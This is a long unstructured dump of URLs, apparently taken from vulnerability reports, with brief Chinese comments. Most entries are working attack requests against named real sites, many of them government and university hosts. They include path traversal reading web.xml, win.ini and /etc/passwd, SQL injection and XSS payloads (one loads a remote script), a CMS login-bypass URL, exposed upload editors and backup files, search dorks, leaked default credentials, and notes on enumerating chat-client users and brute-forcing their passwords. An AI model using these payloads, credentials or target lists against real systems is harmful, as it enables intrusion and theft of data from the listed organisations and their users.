http://www.hfaic.gov.cn/gongshang/DownFile?path=C:/windows/win.ini&showname=win www.tclm.gov.cn:8080/downLoadFile?filePath=WEB-INF/web.xml http://www.ngtc.gov.cn/ngtc/showimage?filePath=WEB-INF/&fileName=web.xml&fileSort=-1111 http://www.hebgwyj.gov.cn/cyportal1.3/downloadtag.jsp?fileName=web.xml&filePath=../WEB-INF/web.xml http://www.wztax.gov.cn/system/FunPages/DownloadFile.jsp?filePath=./WEB-INF&name=web.xml http://xzsp.hcq.gov.cn:94/servlet/download?filepath=/WEB-INF/web.xml&filename=web.xml http://www.xczwzx.gov.cn/FileDownload?filepath=C:windows\win.ini&dispname=win.ini www.yk365.gov.cn/servlet/FileDownload?filepath=C:windows/win.ini www.tongcheng.gov.cn/servlet/FileDownload?filepath=C:windows/win.ini www.56hlj.com/news/downLoad.jsp?filePath=WEB-INF/web.xml http://pc.sach.gov.cn/news/downLoad.jsp?filePath=WEB-INF/web.xml http://www.kuaipan.cn/ http://www.kuaipan.cn/account_login.htm http://202.106.152.13/FCKeditor/editor/filemanager/connectors/uploadtest.html http://www.huazhu.com/PointGift/ShoppingCar.aspx http://api.busdh.com/market-api/appgame/global?f=f384&v=v6.5.0.2013123016 
http://api.busdh.com/market-api/appgame/global?f=f384&v=v6.5.0.2013123016 inurl:online-service!findByAppItemId.action?id= http://long.zhuoyou.com/bbs/data/attachment/forum/201406/23/235748ehbchgldh26d6vli.png/.php http://zjdt.lyghrss.gov.cn:7001/lygzjdt/pages/列目录 http://zjdt.lyghrss.gov.cn:7001/lygzjdt/此处查询到后台管理地址 http://zjdt.lyghrss.gov.cn:7001/lygzjdt/pages/login/adminlogin.html http://zjdt.lyghrss.gov.cn:7001/lygzjdt/pages/lygzj/admin/adminLogin.action http://news.buaa.edu.cn/dispnews.php?type=1&nid=113844&s_table=news_txt http://59.42.176.156:8012/selDept.php,广州市国迈科技有限公司的腾讯通客户端部署平台,因腾讯通的安全隐患,http://59.42.176.156:8012/userlist.php,导致用户名泄露,通过http://59.42.176.156:8012/check.php进行破解,可破解出部分用户密码,然后通过腾讯通客户端就可以登录了,这样可能会造成内部信息泄露,就不详述了。 http://124.232.135.83/10000/login.jsp http://123.157.209.83:8080/ZhongCaiPRM/login.action http://grid.cma.gov.cn http://grid.cma.gov.cn/cmag/trac/newticket?reporter=anonymous&summary=AssertionError%3A+Session+ID+not+set&description=%3D%3D%3D%3D+How+to+Reproduce+%3D%3D%3D%3D%0D%0A%0D%0AWhile+doing+a+POST+operation+on+%60%2Fprefs%2Fadvanced%60%2C+Trac+issued+an+internal+error.%0D%0A%0D%0A%27%27%28please+provide+additional+details+here%29%27%27%0D%0A%0D%0ARequest+parameters%3A%0D%0A{{{%0D%0A{%27__FORM_TOKEN%27%3A+u%27519a024571067c73f538aa5f%27%2C%0D%0A+%27action%27%3A+u%27save%27%2C%0D%0A+%27loadsid%27%3A+u%27%27%2C%0D%0A+%27newsid%27%3A+u%27fbcdb1e8daf790312eaf0c26%27%2C%0D%0A+%27panel_id%27%3A+u%27advanced%27%2C%0D%0A+%27restore%27%3A+u%27\u8f7d\u5165%27}%0D%0A}}}%0D%0A%0D%0AUser+agent%3A+%60Mozilla%2F5.0+%28Windows+NT+6.1%3B+rv%3A30.0%29+Gecko%2F20100101+Firefox%2F30.0%60%0D%0A%0D%0A%3D%3D%3D%3D+System+Information+%3D%3D%3D%3D%0D%0A%E7%B3%BB%E7%BB%9F%E4%BF%A1%E6%81%AF%E4%B8%8D%E5%8F%AF%E7%94%A8%0D%0A%0D%0A%3D%3D%3D%3D+Enabled+Plugins+%3D%3D%3D%3D%0D%0A%E6%8F%92%E4%BB%B6%E4%BF%A1%E6%81%AF%E4%B8%8D%E5%8F%AF%E7%94%A8%0D%0A%0D%0A%3D%3D%3D%3D+Python+Traceback+%3D%3D%3D%3D%0D%0A{{{%0D%0ATraceback+%28most+recent+call+last%29%3A%0D%0A++File+%22%2
Fusr%2Flib%2Fpython2.6%2Fsite-packages%2FTrac-0.12.1-py2.6.egg%2Ftrac%2Fweb%2Fmain.py%22%2C+line+511%2C+in+_dispatch_request%0D%0A++++dispatcher.dispatch%28req%29%0D%0A++File+%22%2Fusr%2Flib%2Fpython2.6%2Fsite-packages%2FTrac-0.12.1-py2.6.egg%2Ftrac%2Fweb%2Fmain.py%22%2C+line+237%2C+in+dispatch%0D%0A++++resp+%3D+chosen_handler.process_request%28req%29%0D%0A++File+%22%2Fusr%2Flib%2Fpython2.6%2Fsite-packages%2FTrac-0.12.1-py2.6.egg%2Ftrac%2Fprefs%2Fweb_ui.py%22%2C+line+77%2C+in+process_request%0D%0A++++template%2C+data+%3D+chosen_provider.render_preference_panel%28req%2C+panel_id%29%0D%0A++File+%22%2Fusr%2Flib%2Fpython2.6%2Fsite-packages%2FTrac-0.12.1-py2.6.egg%2Ftrac%2Fprefs%2Fweb_ui.py%22%2C+line+97%2C+in+render_preference_panel%0D%0A++++self._do_load%28req%29%0D%0A++File+%22%2Fusr%2Flib%2Fpython2.6%2Fsite-packages%2FTrac-0.12.1-py2.6.egg%2Ftrac%2Fprefs%2Fweb_ui.py%22%2C+line+148%2C+in+_do_load%0D%0A++++req.session.get_session%28oldsid%29%0D%0A++File+%22%2Fusr%2Flib%2Fpython2.6%2Fsite-packages%2FTrac-0.12.1-py2.6.egg%2Ftrac%2Fweb%2Fsession.py%22%2C+line+189%2C+in+get_session%0D%0A++++self.bake_cookie%28%29%0D%0A++File+%22%2Fusr%2Flib%2Fpython2.6%2Fsite-packages%2FTrac-0.12.1-py2.6.egg%2Ftrac%2Fweb%2Fsession.py%22%2C+line+170%2C+in+bake_cookie%0D%0A++++assert+self.sid%2C+%27Session+ID+not+set%27%0D%0AAssertionError%3A+Session+ID+not+set%0D%0A}}}&create=%E5%88%9B%E5%BB%BA# http://grid.cma.gov.cn/cmag/portal/guest/52/r/ http://grid.cma.gov.cn/cmag/portal/guest/home/r/ http://202.103.124.52/ http://www.cqlpa.com/cyysquery.jsp http://gdb.17173.com/browser.jsp http://gdb.17173.com/browser.jsp?sort=1&file=%2Fhome%2Fhttpd%2Fhtml%2Fgamedb.17173.com%2FWEB-INF%2Fweb.xml http://gdb.17173.com/browser.jsp?sort=1&file=%2Fhome%2Fhttpd%2Fhtml%2Fgamedb.17173.com%2FWEB-INF%2Fstruts-config.xml http://gdb.17173.com/browser.jsp?sort=1&dir=%2Fhome%2Fhttpd%2Fhtml http://gdb.17173.com/browser.jsp?sort=1&file=%2Fhome%2Fbackup%2Fresin.conf http://gdb.17173.com/browser.jsp?sort=1&dir=%2F 
http://u.uzai.com/manage/order_details/F8C8B3C90B0B0EA5 http://demo.oa8000.com为例。 http://demo.oa8000.com http://demo.oa8000.com/OAapp/jsp/download.jsp?filename=boot.ini&filePath=C%3A%2Fboot.ini&noDecode=1 http://demo.oa8000.com/OAapp/jsp/downloadClient.jsp?filename=boot.ini&filePath=C%3A%2Fboot.ini&noDecode=1 http://forum.dis9.club/logging.php?action=logout&formhash=b1abb3e2&referer=%27-alert%28document.domain%29-%27 http://download.haowan123.com http://download.haowan123.com/?game=6&os=2%20and%201=1 http://download.haowan123.com/?game=6&os=2%20and%201=2 http://www.nysey.com//nytwohospital/hospitalzhuanke/zkjiaoyudisplay.jsp?id=115 http://58.32.236.197:8000/ https://pt.hnu.edu.cn/zfca/login)的密码找回功能: http://webmail.hnu.edu.cn/)收到新密码: http://jky.wxcd.net.cn:8008/license!getExpireDateOfDays.action http://ltx.ncu.edu.cn/ http://ltx.ncu.edu.cn/wp-login.php http://58.56.17.165:8012/selDept.php http://58.56.17.165:8012/userlist.php,导致大量用户名泄露,然后通过http://58.56.17.165:8012/check.php进行破解,可破解出不少密码,然后通过腾讯通客户端就可以登录了,这样可能会造成内部信息泄露,就不详述了。 http://cs.henu.edu.cn/ http://cs.henu.edu.cn/index.php/cs_admin/index xtdoc.9you.com/wp-login.php http://www.ly.com/iflight/requireordernew.aspx?type=tuan http://job.henu.edu.cn/showNewsinfo.aspx?id=1903and1=1&CID=36 http://shop.wanmei.com/images/ http://www.wbo-hotel.com/company/newshow.asp?id=14 http://www.wbo-hotel.com/company https://passport.safedog.cn/chgEmailSubmit.html?userName=admin&oldEmail=aktest@163.com&email=aktest@163.com http://rsc.hbu.cn/ http://127.0.0.1 http://target/showContent.aspx?id=6 http://bcs.zsnet.com/是一个登陆界面。最简单的测试就是输入一些特殊字符,比如'。在密码用万能密码输入,出错如下图: http://demo.kesion.com/ pujun.li/xss.swf http://www.zzairport.com/images/ http://www.zzairport.com/backup/ http://www.china-pub.com/jiaocai/jc_university/jc_university.asp?bookid=14975 http://www.adultscriptpro.com/demo.html http://mitv.tcl.com/DRP http://bit.tcl.com/phpsso_server/2013.php 
http://59.38.32.31:8012/selDept.php,珠海北师大的腾讯通客户端部署平台,因腾讯通的安全隐患,http://59.38.32.31:8012/userlist.php,导致大量用户名泄露,然后通过http://59.38.32.31:8012/check.php进行破解,几千位用户,可破解出不少密码,然后通过腾讯通客户端就可以登录了,这样可能会造成内部信息泄露,就不详述了。 http://advisor.dell-brand.com/index.php?a=index&m=solution&id=45 http://cmis.bhfz.com/cmis40/ http://61.153.216.101/xiao-you/ http://61.153.216.101/xiao-you/dedecms/login.php?dopost=login&validate=dcug&userid=admin&pwd=admin&_POST[GLOBALS][cfg_dbhost]=255.255.255.255&_POST[GLOBALS][cfg_dbuser]=dbusername&_POST[GLOBALS][cfg_dbpwd]=dbpassword&_POST[GLOBALS][cfg_dbname]=dbname http://59.63.158.9:8012/selDept.php,某省委宣传部的腾讯通客户端部署平台,因腾讯通存在的安全隐患,http://59.63.158.9:8012/userlist.php,导致用户名泄露,通过http://59.63.158.9:8012/check.php进行破解,可破解出部分用户密码,然后通过腾讯通客户端就可以登录了,这样可能会造成内部信息泄露,就不详述了。发现问题后没有做进一步测试。 http://v57.demo.dedecms.com/plus/recommend.php?aid=1&action=sendmail&title=%3Ciframe%20src=//www.baidu.com%3E%3C/iframe%3E http://v57.demo.dedecms.com/plus/recommend.php?aid=1&action=sendmail&title=%3CSCRIPT%20SRC=//ha.ckers.org/xss.js%3E%3C/SCRIPT%3E http://xueke.hbu.cn/ http://xueke.hbu.cn/admin/ http://blog.guang.com/wp-login.php http://www.maccms.com/ http://www.zg10080.com/help.aspx http://www.zg10080.com/top.aspx http://www.zg10080.com/webbak.rar d.longtugame.com/daotadata/zrgl?id=3 http://traffic.okaybuy.com.cn/ip_dst.php?site=1%27 http://www.keyp2p.com/thread/14/2014/02/thread2491.html http://www.gxs58.com/thread/16/2014/06/thread4981.html http://221.192.237.91/zsnew/news.php?id=382 http://117.27.230.154/resin-admin/ http://117.27.230.155/resin-admin/ http://www.sxgjj.gov.cn/class.aspx?d=1 http://www.kalcaddle.com http://183.63.187.15/Admin/login.aspx http://www.xjnj.gov.cn/ http://www.xiac.com.cn/info.asp?&page=1&Keywords=&Sort=2 http://www.xiac.com.cn/index1.asp inurl:action http://220.180.184.66:1980/ahsffyww/Default3.action?xxzy.id=3293 http://fy.hnsfj.gov.cn/Login.action http://60.172.0.38:1980/ahsffyww/Default2.action?xxzyxxzy.currentpage=1&xxzyfl.id=7 
http://220.180.199.178:1980/ahsffyww/Default3.action?xxzy.id=1254 http://220.178.252.61:1980/ahsffyww/Default3.action?xxzy.id=967 http://218.22.93.234:1980/ahsffyww/Default2.action?xxzyxxzy.currentpage=1&xxzyfl.id=3 http://60.173.113.172:1980/ahsffyww/Default2.action?xxzyxxzy.currentpage=1&xxzyfl.id=7 http://218.23.48.42:1980/ahsffyww/Default3.action?xxzy.id=1113 http://60.174.104.34:1980/ahsffyww/Default2.action?xxzyxxzy.currentpage=1&xxzyfl.id=5 http://61.191.213.82:1980/ahsffyww/Default3.action?xxzy.id=1652 http://60.173.184.226:1980/ahsffyww/Default3.action?xxzy.id=143 http://61.191.31.26:1980/ahsffyww/Default3.action?xxzy.id=67 http://sys.sdems.com/ a.asp/1.jpg形式可以拿网站shell http://www.xisu.edu.cn/news/display.php?table=pic_news&id=281 http://www.xisu.edu.cn/news/display.php?table=pic_news%20where%20id=281%20and%201=2%20union%20select%201,2,3,4,5,6--&id=281 http://glpt.gdjxjy.com.cn/login.jsp http://tzgl.ynjy.cn/AjaxGetWT.aspx?UserId=wooyun&a=0.1317291921004653 http://hainan.zbglxt.com/AjaxGetWT.aspx?UserId=wooyun&a=0.9363195481710136 http://jx.lianyisoft.com/AjaxGetWT.aspx?UserId=wooyun&a=0.8919568208511919 http://hunan.lianyisoft.com/AjaxGetWT.aspx?UserId=wooyun&a=0.9742523946333677 http://sx.lianyisoft.com/AjaxGetWT.aspx?UserId=wooyun&a=0.29541228362359107 http://zbtj.hyedu.net.cn/AjaxGetWT.aspx?UserId=wooyun&a=0.007287467364221811 http://218.76.27.45:8062/AjaxGetWT.aspx?UserId=wooyun&a=0.6161854930687696 http://sc.zbglxt.com/AjaxGetWT.aspx?UserId=wooyun&a=0.3183394852094352 http://henan.zbglxt.com/AjaxGetWT.aspx?UserId=wooyun&a=0.29813497606664896 http://hb.zbglxt.com/AjaxGetWT.aspx?UserId=wooyun&a=0.63099249987863 http://qh.zbglxt.com/AjaxGetWT.aspx?UserId=wooyun&a=0.47284267260693014 http://ah.zbglxt.com/AjaxGetWT.aspx?UserId=wooyun&a=0.038404270773753524 http://yd.sozhen.com/User/InnOL_Login.aspx http://x55.me/openin.firefox http://hb.189.cn/pages/login/adsllogin/adsllogin.jsp http://filedownload.ktvme.com:8086/ http://filedownload.ktvme.com:9500/test.php 
http://filedownload.ktvme.com:9500/ http://eip.centerm.com/ http://xaszjd.com/ http://xaszjd.com/news.asp?classid=9 http://127.0.0.1/user.php?act=order_detail&order_id=68 http://127.0.0.1/admin/order.php?act=info&order_id=68&print=1 http://pay.553.com/ http://cws.bnu.edu.cn/show.jsp?id=830 http://help.tipask.com/q-19646.html http://help.tipask.com/answer/append/19646/3962.html http://help.tipask.com/question/adopt/?qid=19646&aid=3962 http://58.246.121.44:8080/basepro/login.jsp http://61.233.65.9 http://61.233.102.202 http://61.233.65.9/login_check.php http://61.233.65.9/inc/downfile.php?id_ls=64 http://dorm.pku.edu.cn/news/news.asp?bh=3534 http://do http://www.yilibabyclub.com/admin/login.aspx http://m.tujia.com/nosearch/***?***=216400 http://labs.chinamobile.com/my/ajax_my_ims_init.php?action=record&ft=cloud&channel_id=4296490197 http://labs.chinamobile.com/yueke/show/?url=javascript%3Aprompt%281%29%2F%2F http://www.cm-analysis.com/recom/sugg.php?idealid=blog_ad2&uid=&_st=1403336487090&_tt=%E8%BD%BB%E5%8D%9A%E5%AE%A2_%E7%A7%BB%E5%8A%A8Labs&_ca_tk=o9rbozv8509tmoay85kslb3wcvrmlc7p&tm=1403336975121&placehold=div_for_ad04%27%3E%22%3E%3C%2Ftitle%3E%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cimg+src%3Da+onerror%3Dprompt%281%29%3E http://labs.chinamobile.com/api/upload.php http://labs.chinamobile.com:80/upload.php http://221.182.247.19:1005/pecardweb/ www.111g.com www.111g.com http://www.jiuaidai.com/data/dbbackup/dw_user_0.sql http://www.jiuaidai.com/data/dbbackup/dw_userinfo_0.sql http://www.szrtc.cn/Home/Register http://mp3master.baidu.com/ http://sd.189.cn/selfservice/pay/getOweCharge http://sd.189.cn/selfservice/promotion/campus http://www.fdc.zju.edu.cn/house/Login.aspx http://www.fdc.zju.edu.cn/house/RoomUseCheckList.aspx"中的"根据房间地址查询"存在sql注入 www.fdc.zju.edu.cn http://www.fdc.zju.edu.cn http://scass.hangankeji.com/pcToHome.action,测试了下,存在不少漏洞 http://scass.hangankeji.com/pcToNormalReport.action 
http://scass.hangankeji.com/pcToReportQuery.action这个点,简单手工了测试了一下,本站已shell了,这个点就不深入了,主要是现在凌晨2点了,困死了~~ http://kyxt.u0759.com/web/portal/home.action http://www.ynsncny.com/login/Jeecms.do http://www.gykj.gov.cn/login/Jeecms.do http://www.hhyq.gov.cn/hhyq/login/Jeecms.do http://61.133.220.38:8012/selDept.php,宁夏回族自治区某政府部门的腾讯通客户端部署平台,因腾讯通存在的安全隐患,http://61.133.220.38:8012/userlist.php,导致用户名泄露,通过http://61.133.220.38:8012/check.php进行破解,可破解出部分用户密码,然后通过腾讯通客户端就可以登录了,这样可能会造成内部信息泄露,就不详述了。发现问题后没有做进一步测试。 http://61.138.234.18:8012/selDept.php,新疆某政府部门的腾讯通客户端部署平台,因腾讯通存在的安全隐患,http://61.138.234.18:8012/userlist.php,导致用户名泄露,通过http://61.138.234.18:8012/check.php进行破解,可破解出部分用户密码,然后通过腾讯通客户端就可以登录了,这样可能会造成内部信息泄露,就不详述了。该问题是腾讯通自身的问题,与实施方无关,另外发现问题后没有做进一步测试。 http://112.64.**.**:8080/houtai/login.php http://112.64.**.**:8081/houtai/login.php http://112.64.**.**:8080/ajaxdb/getCdrByStarttime.php http://112.64.**.***:8080/ajaxdb/getCdrByStarttime.php?usr=a http://www.icoremail.gd.cn/ http://blog.sohu.com/home/setting/info.htm http://mo.gw.com.cn/ http://mo.gw.com.cn/type.php?typeid=100 http://train.gw.com.cn/ http://www.sztaiji.com/) inurl:indexAction.action inurl:zxjbAction_showInfo.action?wid= http://zwzx.anshun.gov.cn/bgxz/bgxzAction_executeBack.action http://zwzx.gzxy.gov.cn/bgxz/bgxzAction_executeBack.action http://nyzw.gov.cn/bgxz/bgxzAction_executeBack.action http://www.qzasc.cn/bgxz/bgxzAction_executeBack.action http://zwzx.xifeng.gov.cn/bgxz/bgxzAction_executeBack.action http://61.159.149.200/bgxz/bgxzAction_executeBack.action http://fuwu.donggang.gov.cn/bgxz/bgxzAction_executeBack.action http://211.140.246.58:8080/bgxz/bgxzAction_executeBack.action http://mdjsp.gov.cn/bgxz/bgxzAction_executeBack.action http://blog.sohu.com/home/setting/info.htm http://xb.henu.edu.cn/index.php/admin_control/login http://fxy.henu.edu.cn/index.php/login/index http://211.138.41.19/web/userconfig/login_prelogin.action http://117.79.92.214/ http://117.79.92.213/login.jsp 
http://jf.hnticai.com/luck/init/init.action http://jf.hnticai.com/Silic.jsp http://ccclub.cmbchina.com/cash/CashInvImgInfo.aspx?fileID=99901406252300000815 http://ccclub.cmbchina.com/cash/CashInvImgInfo.aspx?fileID=99901406252300000814 http://ccclub.cmbchina.com/cash/CashInvImgInfo.aspx?fileID=99901406252300000813 http://ccclub.cmbchina.com/cash/CashInvImgInfo.aspx?fileID=99901406252300000812 http://ccclub.cmbchina.com/cash/CashInvImgInfo.aspx?fileID=99901406252300000811 www.chinacreator.com inurl:comm_front inurl:comm_front/email inurl:login.jsp http://www.hngzw.gov.cn/login.jsp http://www.czsx.gov.cn/login.jsp http://www.zixing.gov.cn/login.jsp http://www.czbeihu.gov.cn/login.jsp http://www.hn408.org/login.jsp http://yuanjiang.gov.cn/login.jsp http://www.hn12333.com:81/ http://www.rc.gov.cn/login.jsp http://www.cetz.gov.cn/login.jsp http://www.hnbzdj.com/login.jsp http://www.hnrst.gov.cn/login.jsp http://www.lwx.gov.cn:88/login.jsp http://www.bhqrd.gov.cn/login.jsp http://www.hnrm.gov.cn/login.jsp http://www.hngy.gov.cn/login.jsp http://www.hunangtzy.com/login.jsp http://www.hnipo.gov.cn/login.jsp http://www.hnagri.gov.cn/login.jsp http://zwgk.xiangtan.gov.cn/login.jsp http://www.hunanpps.com/login.jsp http://www.hbt.hunan.gov.cn/login.jsp http://home.focus.cn/decorstuff/compare.php?sel_id_str=650099|&domain_type=59 http://home.focus.cn/decorstuff/compare.php?sel_id_str=650099'|&domain_type=59 http://park.digitalchina.com/cpyw.aspx?id=13 http://www.ecit.edu.cn/ http://ytc.ecit.edu.cn/UploadFiles/Document/201404/51827262077990499.asp http://dg.focus.cn/common/modules/databases/index.php?type=2&action=upload http://shop.focus.cn/.bash_history http://admin.shop.gz.focus.cn/.bash_history http://officeimg.focus.cn/.bash_history http://hn.focus.cn/common/group/topic/rdist6UubwK http://ncimg.focus.cn/common/group/v2012/rdistDrGywI http://yangzhou.focus.cn/common/group/topic/rdistauKEUx http://mis.nec.xmu.edu.cn/ExamPolicy!showExamList.action http://www.sztaiji.com/) 
inurl:indexAction.action inurl:zxjbAction_showInfo.action?wid= http://zwzx.anshun.gov.cn/indexAction.action http://zwzx.gzxy.gov.cn/indexAction.action http://nyzw.gov.cn/indexAction.action http://www.qzasc.cn/indexAction.action http://zwzx.xifeng.gov.cn/indexAction.action http://61.159.149.200/indexAction.action http://fuwu.donggang.gov.cn/indexAction.action http://211.140.246.58:8080/indexAction.action http://mdjsp.gov.cn/indexAction.action http://ddpas.dandong.gov.cn/indexAction.action http://61.186.220.71/xueji/login.aspx http://202.200.168.108/Login/loginpageforuserb.aspx?LogoutURL=%2flogin http://www.aviation-law.cn/ http://www.aviation-law.cn/aSoulkeys/ad_login.asp http://124.128.254.131:8484/status?full=true http://124.128.254.132:8484/status?full=true http://124.128.254.133:8484/status?full=true http://124.128.254.135:8484/status?full=true http://124.128.254.136:8484/status?full=true http://124.128.254.46:8484/status?full=true http://124.128.254.49:8484/status?full=true http://124.128.254.50:8484/status?full=true http://124.128.254.51:8484/status?full=true http://124.128.254.52:8484/status?full=true http://124.128.254.53:8484/status?full=true http://124.128.254.54:8484/status?full=true http://124.128.254.55:8484/status?full=true http://124.128.254.56:8484/status?full=true http://124.128.254.57:8484/status?full=true http://124.128.254.58:8484/status?full=true http://www1.swfc.edu.cn/wyx/admin/1ogin.asp http://www1.swfc.edu.cn/wyx/admin/WebEditor/ http://d.longtugame.com/daotadata/equipment?id=1 http://magazine.tcl.com/manager/login.aspx http://magazine.tcl.com/manager/ftb/help//ftb.imagegallery.aspx?rif=../upload&cif=../upload user:administrator http://www.xjdxyxt.com/, http://www.xjdxyxt.com/SearchResult.aspx?Key=1,key存在注入,中国电信某站漏洞威胁45W用户信息,详情看下面 http://dl.xjdxyxt.com/,用户名18196078834S01,密码123456 http://www.zhanqi.tv/u/login?redirect_on_login=xxx http://www.zhanqi.tv/game/6?ref=xxx http://www.tclbusiness.com/ http://zhaopin.longtugame.com/ 
http://zhaopin.longtugame.com/index.php?m=admin http://www.zhaoshang800.com/news/index.php?c=news&a=ajaxshow&id=35656 http://www.zhaoshang800.com/news/index.php?c=news&a=ajaxshow&id=35656'(错误) http://www.zhaoshang800.com/news/index.php?c=news&a=ajaxshow&id=35656 http://www.zhaoshang800.com/news/index.php?c=news&a=ajaxshow&id=35656 http://tts.ytoxl.com/login.htm http://tts.ytoxl.com/stockout/batch-searchShow.htm http://soft-sk.yonyou.com/service/jszc.jsp http://url:8012/selDept.php,可以暴露使用单位,http://url:8012/userlist.php,暴露用户名,http://url:8012/check.php,没有验证码,可以暴力破解用户名密码,下面是几个列子: http://www.jundoo.com.cn/col/col89/index.html http://58.213.129.204/infoms/identity/index.c http://58.213.129.204/infoms/identity/index.c http://aid.ec.js.edu.cn/infoms/visitor/dcjyZxsq-listXs.c http://aid.ec.js.edu.cn/infoms/visitor/dcjyZxsq-listXs.c http://61.153.216.102:8080/gw/admin/ http://moh.95001111.com/network/indexAction!indexMore.action?indexQuery.isPub=1&indexQuery.channelId=1 http://218.106.129.9:8080/jmx-console/ http://180.166.87.153/ http://www.qiaqiafood.com/company_news.aspx?id=143 http://www.qiaqiafood.com/upload/com3.11111111.asp http://uc.qudao.com/admin.php http://web.admin5.com/ http://w.mail.qq.com/cgi-bin/mobile?sid=【sid】接口登陆邮箱 http://www.cdjtysj.gov.cn/onews?id=440 bt:/pentest/database/sqlmap# http://www.cdjtysj.gov.cn/onews?id=440 bt:/pentest/database/sqlmap# http://www.cdjtysj.gov.cn/onews?id=440 http://115.182.21.40/market/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector http://118.186.205.204:8888 http://battery.tcl.com/read_news.php?id=31 http://xjd.tcl.com/showclick.asp?guid=20130422184740176 http://lighting.tcl.com/cn/products-d.aspx?ID=263&SortID=101 http://callcenter.tcl.com/tclcc/portlets/Examine/begin.do?form_id=3 php:123行 http://58.254.169.91:8080/ http://computer.cdu.edu.cn/1.asp http://www.rosebeauty.com.cn/member/register http://www.shangxueba.com/jingyan/1657263.html http://58.254.169.90/ admin:adminadmin 
http://ems.csdn.net/module/order/order/check_order?order_id=361 http://shop.tcl.com/ProductDetail/getConsult http://www.threeoa.com/product/501.html http://www.jmsyz.net/eeoaftp/downloadFile.action?path=WEB-INF/web.xml http://jdyz.ijd.cn/eeoaftp/downloadFile.action?path=WEB-INF/web.xml http://www.wxxqml.com/eeoaftp/downloadFile.action?path=WEB-INF/web.xml http://www.sxxazx.com:2012/eeoaftp/downloadFile.action?path=WEB-INF/web.xml http://booth.chanjet.com//sys/addUser.jsp http://booth.chanjet.com/statistic/email.jsp http://booth.chanjet.com/chanjet/login.do?method=getUsersByPager http://booth.chanjet.com/.svn/ http://newsletter.baidu.com/u.html?stime=1403762195&uid=baidu&eid=1309383&email=wooyun@qq.com&tlid=259&stid=1672&thid=259&url=IzEjaHR0cDovL25ld3NsZXR0ZXIuYmFpZHUuY29tL3Vuc3Vic2NyaWJlLmh0bWw/Z2lkPTImZW1haWw9d29veXVuQHFxLmNvbQ== http://newsletter.baidu.com/unsubscribe.html?gid=2&email=wooyun@qq.com http://www.exploit-db.com/ http://newsletter.baidu.com/u.html?stime=1403762195&uid=baidu&eid=1309383&email=wooyun@qq.com&tlid=259&stid=1672&thid=259&url=IzEjaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS8= http://newsletter.baidu.com/unsubscribe.html?gid=2&email=wooyun@qq.com http://www.uniwin.com.cn/ http://221.194.46.67:8080/applyinfo/applyinfoSearch.jsp?disposecode=1'&submit=%b2%e9%d1%af inurl:index.do?templet=list_zbjh_zt http://ems.csdn.net/knowledge http://wooyun.org/bugs/wooyun-2010-054577 inurl:zxzx_show.jsp?ID http://www.ahly.gov.cn/hdcy/zxzx_show.jsp?ID=79 http://www.ahhbly.gov.cn/hdcy/zxzx_show.jsp?ID=79 http://www.ahaqly.gov.cn/hdcy/zxzx_show.jsp?ID=304 http://www.ahbbly.gov.cn/hdcy/zxzx_show.jsp?ID=28 http://www.ahczly.gov.cn/hdcy/zxzx_show.jsp?ID=105 http://www.ahxcly.gov.cn/hdcy/zxzx_show.jsp?ID=124 http://www.ahtlly.gov.cn/hdcy/zxzx_show.jsp?ID=34 http://www.ahfyly.gov.cn/hdcy/zxzx_show.jsp?ID=122 http://www.ahlaly.gov.cn/hdcy/zxzx_show.jsp?ID=53 http://www.ahbzly.gov.cn/hdcy/zxzx_show.jsp?ID=42 http://www.ahmasly.gov.cn/hdcy/zxzx_show.jsp?ID=30 
http://www.ahchizly.gov.cn/hdcy/zxzx_show.jsp?ID=133 http://www.ahwhly.gov.cn/hdcy/zxzx_show.jsp?ID=44 http://www.ahhnly.gov.cn/hdcy/zxzx_show.jsp?ID=35 http://www.ahhflyj.gov.cn/hdcy/zxzx_show.jsp?ID=34 http://www.ahhsly.gov.cn/hdcy/zxzx_show.jsp?ID=34 http://www.ahwhly.gov.cn/hdcy/zxzx_show.jsp?ID=34 http://www.ahszly.gov.cn/hdcy/zxzx_show.jsp?ID=34 http://msdn.csdn.net/ http://www.moe.edu.cn/ucapformsresource/resourceservlet.ucap?key=/../../../../../../../../../../etc/httpd/conf/httpd.conf%00.jpg&filename=1.txt http://www.moe.edu.cn/ucapformsresource/resourceservlet.ucap?key=/../../../../../../../../../../etc/passwd%00.jpg&filename=1.txt http://127.0.0.1/phpcms/index.php?m=poster&c=index&a=poster_click&id=1 http://www.kanjian.com/user/116848/board/ http://data.sports.sohu.com/f1/driver_standings.php?season=2009 http://www.highcom.com.cn) intitle:GIP4 inurl:gip inurl:/gip/app/ http://www.hlsafety.gov.cn:8080/gip/FCKeditor/editor/filemanager/browser/default/browser.html?webSiteName=drbt&webSiteId=40287d4619c5fc0c0119c60a6de50001&Type=Image&Connector=connectors/jsp/connector http://www.hrbllw.gov.cn/gip/FCKeditor/editor/filemanager/browser/default/browser.html?webSiteName=drbt&webSiteId=40287d4619c5fc0c0119c60a6de50001&Type=Image&Connector=connectors/jsp/connector http://www.hljelder.com:8001/gip/FCKeditor/editor/filemanager/browser/default/browser.html?webSiteName=drbt&webSiteId=40287d4619c5fc0c0119c60a6de50001&Type=Image&Connector=connectors/jsp/connector http://www.hljtg.com/gip/FCKeditor/editor/filemanager/browser/default/browser.html?webSiteName=drbt&webSiteId=40287d4619c5fc0c0119c60a6de50001&Type=Image&Connector=connectors/jsp/connector http://202.118.192.149/gip/FCKeditor/editor/filemanager/browser/default/browser.html?webSiteName=drbt&webSiteId=40287d4619c5fc0c0119c60a6de50001&Type=Image&Connector=connectors/jsp/connector 
http://www.hegang.gov.cn/gip/FCKeditor/editor/filemanager/browser/default/browser.html?webSiteName=drbt&webSiteId=40287d4619c5fc0c0119c60a6de50001&Type=Image&Connector=connectors/jsp/connector http://www.drbt.gov.cn/gip/FCKeditor/editor/filemanager/browser/default/browser.html?webSiteName=drbt&webSiteId=40287d4619c5fc0c0119c60a6de50001&Type=Image&Connector=connectors/jsp/connector http://218.10.231.107/gip/FCKeditor/editor/filemanager/browser/default/browser.html?webSiteName=drbt&webSiteId=40287d4619c5fc0c0119c60a6de50001&Type=Image&Connector=connectors/jsp/connector http://www.gdfs.csg.cn/ 